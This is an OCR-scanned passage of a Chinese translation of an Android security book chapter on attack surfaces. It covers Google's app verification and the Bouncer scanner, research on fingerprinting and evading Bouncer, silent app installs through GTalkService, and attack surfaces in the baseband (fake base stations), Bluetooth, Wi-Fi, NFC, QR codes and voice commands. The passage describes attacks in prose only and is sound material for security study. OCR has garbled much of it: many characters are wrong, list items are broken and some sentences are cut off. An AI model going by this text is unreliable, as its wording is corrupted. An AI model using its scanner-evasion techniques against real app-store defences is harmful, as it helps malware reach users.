个 数据 库 中 查询 , 来 确定 这 个 应 用 是 否 为 已 知 恶 意 代 码 ,或 者 存在 潜在 的 恶意 因素 。 通 过 这 种 方 
式 ， 验 证 应 用 特性 模拟 了 一 个 简单 的 基于 特征 的 黑 名 单 系统 ,与 反 病毒 系统 使 用 的 机 制 类 似 。 验 



































证 应 用 特性 可 以 基于 应 用 属性 的 分 类 ， 向 用 户 发 出 警告 或 者 完全 阻 断 安装 过 程 ， 图 5-4 显示 了 这 





一 特性 在 发 挥 作用 时 的 界面 。 


2013 年 年 初 ，Android.Troj.mdk 特洛伊 木马 被 发 现 内 舱 到 第 三 方 应 用 站 点 中 的 多 达 7000 个 
Android 破解 应 用 中 ， 其 中 就 包括 《 神 庙 逃亡 》 和 《 捕 鱼 达 人 》 等 多 球 流 行 游戏 。 这 个 木马 在 中 




















国 感染 了 超过 100 万 部 Android 设备 ， 成 为 当时 已 知 的 最 大 僵尸 网 络 之 一 。 它 让 先前 被 发 现 感染 








了 中 国 超过 10 万 部 Android 设备 的 Rootstrap 僵尸 网 络 相形 见 细 。 很 显然 ， 第 三 方 应 用 商店 对 














Android 设备 构成 了 明显 而 现实 的 威胁 ， 应 尽量 避免 使 有 
用 “允许 从 未 知 来 源 安装 应 用 ”的 选项 。 





日。 实际 上 ， 如 果 可 能 ， 应 该 在 设备 上 禁 
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Google Play Store 


图 5-4 ”验证 应 


4. Bouncer 系统 
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用 时 进行 阻 断 或 者 警示 


为 了 应 对 Google Play 商店 中 的 恶意 应 用 ,Android 安全 团队 运行 了 一 个 称 为 Bouncer 的 系统 。 
这 个 系统 在 一 个 虚拟 环境 中 运行 开发 者 上 传 的 应 用 ， 来 确定 应 用 是 否 具有 恶意 行为 。 总 而 言 之 ， 









































Bouncer 是 一 个 动态 运行 时 分 析 工 具 。 它 实际 上 是 一 个 基于 QEMU ( Quick Emulator ) 的 仿真 器 
(与 Android SDK 中 的 非常 类 似 )， 用 来 运行 Android 系统 与 待 检测 的 应 用 。 为 了 恰当 地 仿真 一 个 





真实 移动 设备 的 环境 ，Bouncer 对 一 个 应 月 
口 地 址 竹 
口 相册 
口 短信 记录 
D 文件 
































仿真 了 通 




















用 的 运行 时 环境 ， 这 意味 着 应 用 可 以 访问 : 





所 有 这 些 记 录 都 提供 了 一 些 虚构 数据 ， 对 于 Bouncer 系统 中 的 不 同 仿真 虚拟 机 磁盘 镜像 ， 这 


些 数据 都 不 相同 。Bouncer 也 仿真 了 移动 设备 的 通用 外 设 ， 如 摄像 头 、 加 速 计 和 GPS 等 。 此 外 ， 

它 还 允许 应 用 自由 地 与 因特网 进行 通信 。Charlie Miller 和 Jon Oberheide 使 用 了 一 个 “ 反 向 shell” 
应 用 ， 这 使 得 他 们 通过 HTTP 请 求 ， 获 取 到 了 Google Bouncer 基础 设施 的 终端 访问 。Miller 和 
Oberheide 也 演示 了 一 系列 恶意 应 用 对 Bouncer 进行 指纹 识别 的 方法 , 这 些 技术 包括 识别 Bouncer 
的 短信 记录 、 地 址 矫 、 相 册 中 的 独特 虚构 数据 ， 以 及 对 QEMU 实例 进行 检测 并 进行 独特 性 的 指 
纹 识别 。 这 些 识别 技术 可 以 被 恶意 攻击 者 使 用 ,在 当 Bouncer 系统 正在 监视 时 ， 避 免 让 他 们 的 应 

































































用 执行 恶意 功能 。 随 后 ， 在 用 户 手 机 上 执行 的 同一 应 用 ， 却 可 以 正确 地 开始 它 的 恶意 行为 。 


Nicholas Percoco 在 他 的 Blackhat 2012 白皮书 “Adventures in Bouncerland”(“Bouncer 领地 探 
险 ”) 中 发 布 了 类 似 的 研究 工作 。 与 检测 Bouncer 是 否 存在 的 思路 不 同 ， 他 的 方法 是 开发 一 个 能 
够 获得 下 载 与 执行 恶意 JavaScript 代码 权限 的 应 用 。 这 个 应 用 的 原本 功能 是 以 Web 为 后 台 、 用 户 
可 配置 的 短信 拦截 应 用 ， 但 在 取得 访问 Web 页 面 与 下 载 执行 JavaScript 代码 的 权限 之 后 ， 后 端 
Web 服务 器 就 很 显然 地 变 成 一 个 命令 与 控制 信道 , 并 可 以 在 运行 时 为 应 用 提供 恶意 代码 。Percoco 
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的 研究 也 演示 验证 了 : 对 最 新 发 布 应 用 相对 很 小 的 一 次 更 新 ， 可 以 含有 恶意 内 容 而 不 被 Bouncer 
系统 发 现 。 

即使 不 用 这 些 绕 过 Bouncer 系统 的 技术 ， 
攻击 面 。 对 于 默认 配置 的 Android 设备 而 言 ， 恶意 
被 配置 成 允许 安装 第 三 方 应 用 ， 而 绝 大 多 数 ; 恶意 应 用 就 是 在 第 三 方 及 和 用 

5. Google Phones Home 

在 后 台 ，Android 设备 会 通过 一 个 称 为 GTalkService 的 服务 连接 到 谷歌 公司 的 基础 设施 上 ， 
这 一 服务 使 用 谷歌 公司 的 ProtoBufs 传输 协议 实现 ， 支 持 一 个 设备 连接 到 多 个 谷歌 公司 的 后 台 服 
务 上 。 例 如 ，Google Play 商店 和 Gmail 都 使 用 这 一 服务 来 访问 云 中 的 数据 。 谷 歌 公司 在 Android 
2.2 中 实现 了 使 用 GTalkService 协议 的 云端 通信 机 制 (C2DM )。2012 年, 谷歌 公司 废弃 了 C2DM ， 
并 引入 Google 云 通信 机 制 (GCM )。GCM 继续 使 用 GTalkService 来 进行 云 通信 。 一 个 具体 的 例 


子 是 通过 Google Play 网 站 来 安装 应 用 ， 如 图 5-5 所 示 。 
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图 5-5 从 Web 安装 一 个 应 用 














与 用 户 发 起 的 安装 不 同 ，GTalkService 最 有 意思 的 一 个 属性 是 ， 它 允许 谷歌 公司 根据 自己 的 
意志 来 安装 和 移 除 应 用 。 事 实 上 , 这 个 过 程 还 可 能 以 完全 静默 的 方式 进行 , 而 不 用 通知 终端 用 户 。 
在 过 去 , 谷歌 公司 将 这 一 机 制作 为 应 急 处 置 机 制 , 一 次 就 可 以 从 整个 设备 池 中 移 除 被 确认 的 恶意 
应 用 。 然 而 ， 它 也 使 用 了 这 一 机 制 往 设备 上 推送 应 用 。2013 年 ， 谷 歌 公 司 主动 向 一 些 较 旧 的 设 
备 提 供 了 名 为 Google Play Services 的 API， 为 此 ， 谷 歌 公司 在 所 有 Android 设备 上 安装 了 一 个 新 
应 用 ,来 提供 这 一 功能 。 

尽管 GTalkService 代表 着 一 个 非常 有 趣 的 攻击 面 ， 但 是 能 够 达到 它 的 攻击 向 量 需 要 可 信访 
问 。 而 这 一 功能 连接 到 云 的 通信 ， 是 由 认证 锁定 的 SSL 协议 进行 安全 保护 的 。 这 限定 了 攻击 只 
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能 从 谷歌 的 后 台 发 起 ， 但 话说 回来 ， 利 用 谷歌 的 后 台 来 进行 攻击 也 不 是 完全 不 可 能 。 

遗憾 的 是 ,深入 分 析 GTalkService 暴露 的 攻击 面 需要 非常 大 的 逆向 分 析 工 作 量 。 实 现 Android 
设备 这 一 部 分 功能 的 组 件 是 闭 源 的 ， 并 非 Android 开放 源 代码 项 目 (AOSP ) 的 组 成 部 分 。 对 这 
些 代码 进行 审查 需要 使 用 反 汇 编 器 、 反 编译 器 和 其 他 一 些 专用 工具 。 一 个 很 好 的 起 点 是 对 Google 
Play 应 用 或 GTalkService 进行 逆向 分 析 。 

Jon Oberheide 验证 演示 了 两 次 利用 GTalkService 来 攻破 设备 的 不 同 攻击 。 第 一 次 演示 是 在 
SummerCon 2012 大 会 上 ,证 明了 可 以 通过 com.accounts.AccountManager 的 API， 访 问 用 于 保持 
持续 性 后 台 连 接 的 认证 令 牌 。 恶 意 应 用 可 以 使 用 这 一 令 牌 来 进行 静默 的 应 用 安装 , 无 须 提示 用 户 
或 让 用 户 审查 应 用 权限 。 这 一 攻击 的 详细 信息 可 访问 https://jon.oberheide.org/blog/2011/05/28/ 
when-angry-birds-attack-android-edition/ 。 第 二 次 演示 详 见 https://jon.oberheide.org/blog/2011/03/ 
07/how-i-almost-won-pwn2own-via-xss/, 证 明了 Google Play 网 站 上 存在 一 个 XSS 安全 漏洞 , 攻击 
者 可 以 利用 它 完成 同样 的 攻击 目的 。 但 是 这 次 ， 并 不 需要 安装 恶意 应 用 。 在 这 两 次 演示 中 ， 
Oberheide 都 开发 了 概念 验证 代码 来 演示 攻击 。Oberheide 的 发 现 影响 巨大 而 且 相 当 简单 ， 对 这 个 
攻击 面 进 行 更 深入 的 探索 也 是 未 来 一 个 非常 有 趣 的 研究 方向 。 


5.4 ”物理 相 邻 


回顾 一 下 5.3.1 节 第 4 条 中 对 “物理 相 邻 ”的 定义 。 物 理 攻击 需要 直接 接触 目标 设备 ， 而 与 
之 不 同 的 是 , 物理 相 邻 攻击 只 需要 攻击 者 在 目标 设备 的 某 一 范围 之 内 。 这 一 攻击 面 的 大 部 分 都 涉 
及 各 种 类 型 的 射频 ( RF ) 通信 。 然 而 也 有 一 些 攻击 面 是 和 射频 无 关 的 。 本 节 将 详细 介绍 各 种 无 
线 通信 信道 ， 并 讨论 在 物理 相 邻 范围 内 可 达 的 其 他 攻击 面 。 


5.4.1 无 线 通信 


Android 设备 都 支持 多 种 基于 射频 的 无 线 技术 ， 几 乎 所 有 设备 都 支持 Wi-Fi 和 蓝牙 ， 许 多 还 
支持 GPS。 可 以 拨打 电话 的 设备 支持 一 种 或 多 种 标准 化 的 手机 通信 技术 ， 如 GSM ( 全 球 移动 通 
信 系 统 ) 和 CDMA ( 码 分 多 址 ) 等 ， 较 新 的 Android 设备 还 支持 NFC ( 近 场 通信 )。 每 一 种 无 线 
技术 都 有 特定 的 频率 , 因此 仅 在 某 个 物理 相 邻 范围 内 才 是 可 达 的 。 下 面 几 个 小 节 将 深入 探讨 每 一 
种 技术 ,并 解释 相关 的 访问 需求 。 但 在 此 之 前 , 让 我 们 先 了 解 一 下 可 以 应 用 到 所 有 这 些 媒介 中 的 
一 些 基本 概念 。 

所 有 的 无 线 通信 都 容易 受到 大 量 的 各 类 攻击 , 包括 主动 攻击 与 被 动 攻击 。 主 动 攻击 要 求 攻击 
者 干扰 正常 的 信息 流 , 包括 阻塞 、 欺 骗 和 中 间 人 (MitM ) 等 攻击 形式 。 因 为 Wi-Fi 和 蜂窝 网 络 是 
用 来 访问 整个 互联 网 的 , 因此 针对 这 些 媒介 的 中 间 人 攻击 可 以 达到 非常 丰富 的 攻击 面 。 而 被 动 攻 
击 ( 如 网 络 嗅 探 ) 可 以 让 攻击 者 攻破 流 经 这 些 媒介 的 信息 流 。 偷 窍 到 的 信息 是 非常 重要 的 。 举 例 
来 说 ， 窃 取 来 的 键 击 记录 、 认 证 凭据 、 金 融 数 据 或 其 他 数据 ， 可 能 被 用 来 进行 影响 更 大 的 攻击 。 

1. GPS 

GPS， 通 常 指 代 Android 中 的 位 置 数据 ， 可 以 让 设备 确定 自身 在 地 球 上 的 位 置 。 它 通过 从 围 
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绕 地 球 轨 道 飞 行 的 卫星 获取 信号 来 工作 。GPS 接收 恬 蕊 片 接收 这 些 卫 星 信 号 并 进行 放大 , 然后 根 
据 结 果 确 定 自己 所 在 的 位 置 。 绝 大 多 数 人 知道 GPS 是 因为 它 经 常 被 用 来 进行 语音 导航 。 事 实 上 ， 
专门 为 导航 而 设计 的 设备 通常 被 称 为 GPS 设备 。 现 在 ，GPS 已 经 成 为 旅行 者 的 重要 工具 。 

然而 ， 如 此 广泛 地 使 用 GPS 并 不 是 没有 争议 的 。 尽 管 GPS 是 一 种 单 向 通信 机 制 ， 但 是 位 置 
数据 会 通过 Android 框架 ( android.location API ) 和 Google Play Services ( Location Services API ) 
暴露 给 Android 应 用 。 无 论 使 用 了 哪个 API， 许 多 Android 应 用 并 不 尊重 终端 用 户 的 隐私 ， 而 是 
监视 用 户 的 位 置 。 有 些 应 用 的 作者 被 认为 将 用 户 的 位 置 数据 卖 给 了 未 知 第 三 方 。 这 一 事实 需要 引 
起 充分 的 关注 与 重视 。 

在 底层 ， 每 个 设备 上 实现 GPS 功能 的 软 硬 件 会 有 所 差异 ， 有 些 设备 拥有 一 个 提供 GPS 支持 
的 单独 芯片 ， 而 其 他 的 将 GPS 支持 集成 到 一 个 芯片 系统 上 。 硬件 的 支持 软件 也 相应 地 具有 差异 ， 
并 通常 是 财源 和 专 有 的 。 这 一 事实 使 得 枚 举 并 深入 分 析 暴 露 的 攻击 面 变 得 非常 困难 、 耗 时 ， 而 且 
不 同 设备 的 情况 还 不 一 样 。 与 其 他 任何 通信 机 制 一 样 , 处 理 无 线 电 的 软件 本 身 就 代表 着 一 个 直接 
的 攻击 面 。 随 着 数据 从 软件 栈 往 上 流动 ， 还 有 其 他 额外 的 攻击 面 。 

GPS 信和 号 是 从 外 太空 发 射 的 ,因此 理论 上 攻击 者 可 以 离 他 的 目标 非常 远 。 然 而 ， 目 前 还 没有 
通过 GPS 无 线 电信 号 来 攻破 Android 设备 的 已 知 攻击 案例 。 因 为 Android 设备 并 没有 将 GPS 信息 
用 于 安全 目的 ( 如 认证 )， 所 以 这 种 攻击 的 可 能 性 是 非常 有 限 的 。 目 前 涉及 位 置 数据 的 唯一 已 知 
攻击 是 欺骗 攻击 , 这 些 攻击 可 以 在 用 户 使 用 语音 导航 时 误导 用 户 , 或 者 在 那些 使 用 位 置 数据 作为 
部 分 代码 逻辑 的 游戏 应 用 中 作 浆 。 

2. 基带 

智能 手机 区 别 于 其 他 智能 设备 的 特点 是 ,可 以 与 移动 网 络 通信 。 在 最 底层 ,这 一 功能 是 由 蜂 
窝 调 制 解 调 需 提供 的 。 这 个 组 件 通 常 被 称 为 基带 处 理 器 , 可 能 是 单个 芯片 , 也 可 能 是 片上 系统 的 
一 部 分 。 在 这 个 芯片 上 运行 的 软件 被 称 为 基带 固件 ， 它 是 Android 电话 栈 (telephony stack ) 的 软 
件 组 件 。 对 基带 的 攻击 非常 具有 吸引 力 ， 因 为 它 有 以 下 两 个 特点 : 终端 用 户 难以 察 党 ， 以 及 能 
访问 手机 通话 记录 及 传输 的 数据 。 正 因为 如 此 ， 它 代表 着 智能 手机 一 个 具有 吸引 力 的 攻击 面 。 
尽管 针对 基带 的 攻击 是 远程 攻击 , 但 是 攻击 者 必须 和 目标 在 一 定 的 范围 内 。 在 一 般 的 部 署 条 
件 下 , 手机 基带 芯片 可 以 在 基站 的 几 公里 之 外 。 移 动 设 备 会 自动 连接 到 信号 最 强 的 基站 上 ,因此 
攻击 者 只 要 离 潜在 目标 足够 近 ， 就 可 以 被 当成 信号 最 强 的 基站 。 目 标 与 攻击 者 的 “基站 ”进行 关 
联 后 , 攻击 者 就 可 以 对 目标 的 通信 进行 中 间 人 攻击 , 或 者 向 目标 发 送 攻 击 流量 。 这 种 类 型 的 攻击 
被 称 为 “ 伪 基 站 ”攻击 ， 近 年 来 得 到 了 相当 多 的 关注 。 

Android 智能 手机 支持 多 种 移动 通信 技术 ,包括 GSM、CDMA 和 LTE 等 。 每 种 技术 都 是 由 
一 组 支持 蜂 帘 网络 中 不 同 组 件 相互 通信 的 协议 组 成 的 。 为 了 攻破 一 个 设备 , 最 需要 关注 的 协议 就 
是 那些 设备 所 支持 的 协议 , 每 个 协议 都 代表 着 一 个 攻击 向 量 , 而 处 理 协议 的 底层 代码 代表 着 一 个 
攻击 面 。 

要 想 深入 分 析 基 带 所 暴露 出 的 攻击 面 ， 不 仪 需 要 熟练 运用 IDA Pro 等 工具 ， 还 要 会 用 一 些 专 
业 设 备 。 因 为 基带 固件 通常 都 是 财源 的 、 专 有 的 ， 而 且 特 定 于 所 使 用 的 基带 处 理 器 ， 所 以 对 它 进 
行 逆 向 和 审核 非常 具有 挑战 性 。 要 与 基带 进行 通信 ， 必 须 使 用 一 些 高 级 的 无 线 电 硬 件 ， 如 Ettus 
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Research 公司 的 USRP ( Unversal Software Radio Perpheral， 通 用 软件 无 线 电 外 设 )， 或 者 Nuand 
公司 的 BladeRF 等 。 然 而 也 有 一 些小 型 的 便携 式 基 站 ， 如 Femtocells 和 Picopops， 可 以 让 任务 变 
得 简单 。 当 硬件 就 位 后 ， 仍 然 需要 实现 必要 的 协议 才能 分 析 攻 击 面 。 开 放 移 动 通信 ( Osmocom ) 
项 目 与 其 他 一 些 项 目 为 其 中 涉及 的 一 些 协议 提供 了 开源 实现 。 

在 Android 操作 系统 中 ， 无 线 电 接口 层 (RIL ) 与 基带 进行 通信 ， 并 向 设备 的 其 余部 分 暴露 
蜂窝 通信 功能 。 关 于 RIL 的 更 多 信息 见 第 11 章 。 

3. 蓝 

蓝牙 无 线 技术 在 Android 设备 上 广泛 使 用 ， 支 持 许 多 种 功能 ， 同 时 也 暴露 了 一 个 丰富 的 攻击 
面 。 蓝 牙 被 设计 来 作为 串口 通信 的 无 线 蔡 代 ， 具 有 发 射 范围 小 、 功 耗 低 的 特点 。 尽 管 大 多 数 蓝牙 
通信 被 限制 在 大 约 10 米 的 范围 内 ， 但 是 使 用 天 线 和 更 强大 的 传输 器 可 以 将 通信 范围 扩大 约 100 
米 。 这 让 蓝牙 成 为 了 攻击 Android 设备 距离 第 三 远 ( 排 在 基带 与 Wi-Fi 之 后 ) 的 无 线 媒 介 。 

绝 大 多 数 移动 设备 用 户 对 蓝牙 是 非常 熟悉 的 , 这 要 归功 于 蓝牙 耳机 的 流行 。 但 是 许多 用 户 并 
不 知道 蓝牙 实际 上 有 30 多 种 协议 (Profile )， 每 种 蓝牙 协议 都 定义 了 蓝牙 设备 的 一 项 特殊 功能 。 
例如 ， 大 多 数 蓝牙 耳机 使 用 HFP (Hands-Free Profile， 免 提 协 议 ) 或 HSP ( Handset Profile, )， 这 
些 蓝 牙 协议 让 连接 的 设备 能 够 控制 蓝牙 耳机 的 扬声器 、 话 简 等 。 其 他 常用 的 蓝牙 协议 有 文件 传输 
协议 (FTP )、 拨 号 网 络 (DUN ) 协 议 、 人 机 接口 设备 (HID ) 协 议和 音 视频 远程 控制 协议 (ACRCP ) 
等 。 尽管 不 会 具体 地 介绍 这 些 协议 , 但 我 们 建议 你 做 更 多 研究 , 来 更 全 面 地 理解 蓝牙 所 暴露 出 的 
攻击 面 。 

各 种 蓝牙 协议 中 的 大 部 分 功能 都 需要 首先 进行 配对 。 这 通常 需要 在 两 台 设 备 上 都 输入 一 个 数 
字 码 ， 通 过 确认 来 进行 对 话 。 一 些 设备 使 用 硬 编码 的 数字 码 ， 因 而 非常 容易 攻击 。 建 立 配 对 后 ， 
有 可 能 支持 会 话 并 进行 滥用 。 可 能 的 攻击 方法 包括 BlueJacking、BlueSnarfing 和 Bluebugging。 除 
了 可 以 与 一 些 免 提 设备 配对 ，Android 设备 还 可 以 相互 之 间 进 行 配对 ， 来 传输 联系 人 列表 、 文 件 
等 。 蓝 牙 协 议 设计 时 的 功能 是 非常 多 样 化 的 ， 也 提供 了 攻击 者 希望 得 到 的 几乎 所 有 功能 访问 。 许 
多 可 行 的 攻击 都 利用 了 蓝牙 协议 规范 中 配对 和 加 密 过 程 的 一 些 弱 点 。 因 此 , 蓝牙 代表 着 一 个 有 竺 
进一步 探索 、 非 常 丰富 而 复杂 的 攻击 面 。 

在 Android 设 备 上 ， 蓝 牙 暴露 的 攻击 面 首先 从 内 核 开 始 。 在 内 核 中 ,设备 驱动 与 硬件 进行 接 
口 ， 并 实现 了 许多 蓝牙 协议 都 涉及 的 一 些 底层 协议 , 包括 逻辑 链 路 控制 和 适 配 协 议 (L2CAP ) 以 
及 射频 通信 (RFCOMM ) 协议 等 。 内 核 驱 动 通过 进程 间 通 信 (IPC ) 机 制 ， 向 Android 操作 系统 
暴露 了 额外 的 功能 。Android 在 4.2 版 本 之 前 都 是 使 用 Bluez 用 户 空间 蓝牙 协议 栈 ,在 4.2 版 本 时 
改 用 了 Bluedroid。 接 下 来 ， 在 Android 框架 层 实现 了 暴露 给 Android 应 用 的 高 层次 API， 每 个 组 
件 都 代表 着 整体 攻击 面 的 一 部 分 。 关 于 Android 系统 中 蓝牙 子 系统 的 更 多 信息 ， 可 参见 
https://source. android.com/devices/bluetooth.html。 

4. Wi-Fi 

几乎 所 有 的 Android 设备 都 支持 最 基本 形式 的 Wi-Fi， 而 新 设备 在 被 设计 生产 时 ， 都 很 好 地 
跟 上 了 Wi-Fi 协议 标准 的 发 展 。 在 写作 本 书 时 ， 受 到 最 广泛 文 持 的 标准 是 802.11g 和 802.11n， 而 
只 有 很 少 一 部 分 设备 支持 802.11ac。Wi-Fi 协议 主要 用 于 连接 局 域 网 ， 而 局 域 网 会 提供 对 互联 网 
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的 访问 。Wi-Fi 协 议 也 可 以 被 用 于 使 用 Ad-Hoc 或 Wi-FiDirect 模 式 ， 直 接连 接 到 其 他 计算 机 系统 。 
一 个 典型 的 Wi-Fi 网 络 最 大 范围 大 约 36 米 ,但 是 可 以 非常 简单 地 使 用 中 继 器 或 定向 天 线 进 行 扩展 。 

需要 说 明 的 是 ， 对 Wi-Fi 的 完整 介绍 超出 了 本 书 范围 。 其 他 一 些 已 出 版 图 书 ,包括 Hacking 
Exposed Wirelessu"， 更 加 详细 地 讲解 了 Wi-Fi 网 络 ， 感 兴趣 的 读者 可 以 参考 。 本 节 尝 试 概要 介绍 
Wi-Fi 中 的 安全 概念 ， 然 后 解释 它们 是 如 何 构 成 Android 设备 攻击 面 的 。 

Wi-Fi 网 络 可 以 被 配置 成 无 需 认证 或 者 使 用 不 同 强 度 的 多 种 认证 机 制 中 的 一 种 。 无 需 认证 的 
开放 网 络 可 以 用 完全 被 动 的 方式 ( 无需 连接 ) 进行 无 线 监听 , 而 认证 网 络 使 用 了 不 同 的 加 密 算 法 
来 保护 无 线 传 输 ， 因 此 无 需 连接 的 监听 会 变 得 更 加 困难 ， 至少 需要 首先 破解 密 钥 。 三 种 最 为 流行 
的 认证 机 制 是 WEP、WPA 和 WPA2。WEP 相当 容易 破解 ， 因 此 基本 可 以 等 同 于 没有 保护 。WPA 
是 设计 用 来 解决 这 些 弱点 的 ， 而 WPA2 则 更 进一步 地 增强 了 Wi-Fi 网 络 的 认证 和 加 密 。 

Android 上 的 Wi-Fi 协议 栈 与 蓝牙 协议 栈 非 常 类 似 。 事 实 上 ， 许 多 设备 经 常 包 含 同 时 实现 了 
这 两 种 技术 的 单一 芯片 。 与 蓝牙 协议 相似 ，Wi-Fi 协议 软件 栈 的 源 代码 是 开源 的 。 它 也 是 从 内 核 
驱动 开始 ， 内 核 驱 动 管理 硬件 并 处 理 大 多 数 的 底层 协议 。 在 用 户 空间 ，wpa_supplicant 实现 
了 认证 协议 ， 而 Android 操作 系统 管理 记 住 的 无 线 连接 。 与 蓝牙 类 似 ， 这 些 组 件 被 暴露 给 不 可 信 
的 数据 ， 因 此 也 代表 着 一 类 非常 有 趣 而 值得 进一步 探索 的 攻击 面 。 

除了 能 连接 到 Wi-Fi 无 线 接 人 点 (AP ) 之 外 ,大 多 数 Android 设备 还 能 作为 AP 热点。 在 这 
一 过 程 中 , 设备 将 会 显著 地 扩大 它 的 攻击 面 。 另外 的 一 些 用 户 空间 代码 , 具体 而 言 也 就 是 hostapd 
和 DNS 服务 器 ， 将 会 被 启动 并 暴露 在 网 络 上 。 这 扩大 了 远程 攻击 面 ， 特 别 是 对 那些 能 够 连 到 
Android 设备 AP 热点 上 的 攻击 者 。 

除了 通用 的 Wi-Fi 攻击 ， 还 没有 针对 Android 设备 Wi-Fi 协议 栈 的 已 知 成 功 攻击 。 可 行 的 通 
用 攻击 包括 伪 基 站 与 中 间 人 攻击 。 

5. NFC 

NFC 是 建立 在 射频 标识 (RFID ) 之 上 的 无 线 通信 技术 。 在 Android 设备 所 支持 的 各 种 无 线 
技术 中 ，NFC 的 作用 范围 是 最 短 的 ， 通 常 不 超过 约 20 厘米 。Android 设备 上 的 NFC 有 三 种 典型 
的 应 用 场景 。 第 一 , 标签 (通常 以 贴纸 的 形式 ) 被 呈现 给 设备 , 设备 读 取 标签 的 数据 并 进行 处 理 。 
在 某 些 场 合 中 ,这 些 贴纸 会 作为 交互 式 广告 海报 的 一 部 分 在 公共 场所 展示 ; 第 二 ,两 位 用 户 将 他 
们 的 Android 设备 紧 靠 在 一 起 来 传输 数据 ( 如 照片 ); 第 三 ，NFC 经 常用 于 非 接触 式 的 支付 。 

Android 对 NFC 的 实现 相当 简单 -图 5-6 显示 了 Android NFC 协议 栈 的 概要 。 内 核 驱动 与 NFC 
硬件 进行 对 话 ， 但 并 不 深入 处 理 接收 的 NFC 数据 ， 而 是 将 数据 传递 给 Android 框架 层 的 NFC 服 
务 (com.android.nfc )。NFC 服务 则 将 处 理 后 的 NFC 标签 数据 传递 给 那些 已 经 注册 接收 NFC 
消息 的 应 用 。 

NFC 数据 可 以 通过 多 种 形式 接收 ， 其 中 许多 是 Android 默认 支持 的 。 所 有 这 些 被 支持 的 实现 
都 在 Android SDK 的 TagTechnology 类 中 进行 了 很 好 的 文档 说 明 。 关 于 Android 上 NFC 的 更 多 
信息 ， 详 见 http://developer.android.com/guide/topics/connectivity/nfc/index.html。 
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NFC 标 签 


NFC 标 签 数据 一 一 2 和 
(Nodef、MiFare 等 ) 





NFC 传 输 器 /接收 器 


Android 内 核 


libpn544 fs.so 


NFC 服 务 (com.android.nfc ) 





libnfe_jni.so] | libnfe.so | | iibnfe ndefso | 


Android 应 用 Android 应 用 Android 应 用 


图 5-6 Android 上 的 NFC 


最 流行 的 消息 格式 是 NFC 数据 交换 格式 (NDEF )，NDEF 消息 可 以 包含 任何 数据 ， 但 通常 
只 是 用 来 传输 文本 、 电 话 号 码 、 联 系 信息 、URL 和 图 人像。 解析 这 些 类 型 的 消息 经 常会 导致 执行 
一 些 动作 ， 比 如 进行 蓝牙 设备 配对 、 启 动 Web 浏览 器 、 拨 号 、 打 开 YouTube 或 地 图 应 用 等 。 在 
某 些 情况 下 ,这 些 操作 无 需 任何 用 户 交 互 而 直接 被 执行 ， 这 种 特性 对 攻击 者 特别 具有 吸引 力 。 在 
通过 NFC 获取 文件 时 ， 有 些 设备 会 根据 文件 类 型 启动 默认 的 应 用 来 打开 接收 到 的 文件 。 这 些 操 
作 中 每 一 个 都 是 NFC 之 下 额外 攻击 面 的 很 好 案例 。 

目前 已 经 有 好 几 个 利用 NFC 成 功 攻陷 Android 设备 的 案例 。Charlie Miller 演示 过 用 NFC 来 
自动 建立 起 其 他 无 线 技术 (如 蓝牙 和 Wi-Fi Direct ) 的 连接 。 这 就 能 够 到 达 一 个 原本 不 可 用 的 攻 
击 面 。Georg Wicherski 和 Joshua J. Drake 在 2012 年 BlackHat USA 大 会 上 演示 了 通过 NFC 发 起 的 
一 次 成 功 的 浏览 器 攻击 。 此 外 ， 之 前 还 有 提 及 ，MWR 实验 室 的 研究 人 员 在 2012 年 的 Mobile 
Pwn2Own 大 赛 上 , 使 用 NFC 来 利用 Polaris Office 文 档 套 件 中 的 一 个 文件 格式 解析 漏洞 。 这 些 攻 
击 都 验证 了 ，Android 设备 对 NFC 支持 所 暴露 的 攻击 面 可 导致 设备 被 攻破 。 


5.4.2 ”其 他 技术 
除了 无 线 通信 之 外 , 还 有 其 他 两 个 技术 也 与 Android 设备 的 整体 攻击 面相 关 。 具体 而 言 ， QR 
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码 ( 快速 响应 矩阵 码 ) 和 语音 指令 在 理论 上 可 以 导致 设备 被 攻破 , 对 基于 Android 的 Google Glass 
和 新 的 Android 设备 (如 Moto X 和 Nexus 5 ) 更 是 如 此 。Google Glass 的 早期 版 本 在 每 次 拍照 时 
都 会 处 理 QR 码 。Lookout 移动 安全 公司 发 现 , 一 个 秘密 摆 放 的 QR 码 会 导致 Google Glass 加 入 恶 
意 的 Wi-Fi 网 络 中 ,加 入 后 设备 可 以 被 进一步 攻击 。 另 外 ，Google Glass 还 大 量 使 用 了 语音 指令 ， 
一 位 坐 在 Google Glass 用 户 旁边 的 攻击 者 可 以 向 设备 说 出 指令 ， 可 以 潜在 地 让 Google Glass 访问 
一 个 恶意 网 站 ， 然 后 进行 攻破 。 尽 管 以 这 些 技术 的 底层 实现 作为 目标 会 很 困难 , 但 是 它们 提供 的 
功能 留 下 了 利用 空间 ， 因 此 也 可 能 成 为 设备 被 攻破 的 一 条 途径 。 


5.5 本 地 攻击 面 


当 攻 击 者 获得 对 一 个 设备 的 任意 代码 执行 后 , 那么 逻辑 上 的 下 一 步 就 是 权限 提升 了 。 终极 目 
标 是 获得 享有 特权 的 代码 执行 ， 包 括 在 内 核 空间 中 执行 ， 或 者 以 root 或 system 用 户 身 份 执行 。 
然而 ， 只 是 获取 到 少量 权限 ( 如 一 个 附属 用 户 组 的 权限 ), 也 经 常 可 以 暴露 出 更 多 受 限 的 攻击 面 。 
通常 , 在 尝试 找到 新 的 root 方 法 时 , 这 些 攻击 面 是 最 需要 仔细 检查 的 地 方 。 我 们 在 第 2 章 中 提 到 ， 
权限 隔离 的 广泛 使 用 意味 着 ， 为 了 实现 终极 目标 需要 结合 使 用 多 个 小 的 提升 漏洞 。 

本 节 将 近 距 离 地 观察 暴露 给 设备 上 已 运行 代码 的 不 同 攻击 面 ， 而 已 运行 代码 可 以 是 一 个 
Android 应 用 ， 也 可 以 是 通过 ADB 的 shell 或 其 他 。 访 问 这 些 攻击 面 所 需 的 权限 ， 取 决 于 这 些 不 
同 端点 是 如 何 被 加 固 的 。 为 了 帮助 理解 Android 系统 中 广泛 使 用 的 权限 隔离 机 制 ， 本 节 将 介绍 一 
些 用 来 审查 OS 权限 和 枚 举 暴 露 端点 的 工具 。 


5.5.1 探索 文件 系统 


Android 的 UNIX 血统 意味 着 许多 攻击 面 都 是 通过 文件 系统 条 目 暴 露 的 。 这 些 条 目 包 括 内 核 
空间 和 用 户 空间 的 端点 。 在 内 核 空 间 , 设备 驱动 节点 与 特殊 的 虚拟 文件 系统 提供 与 内 核 空间 驱动 
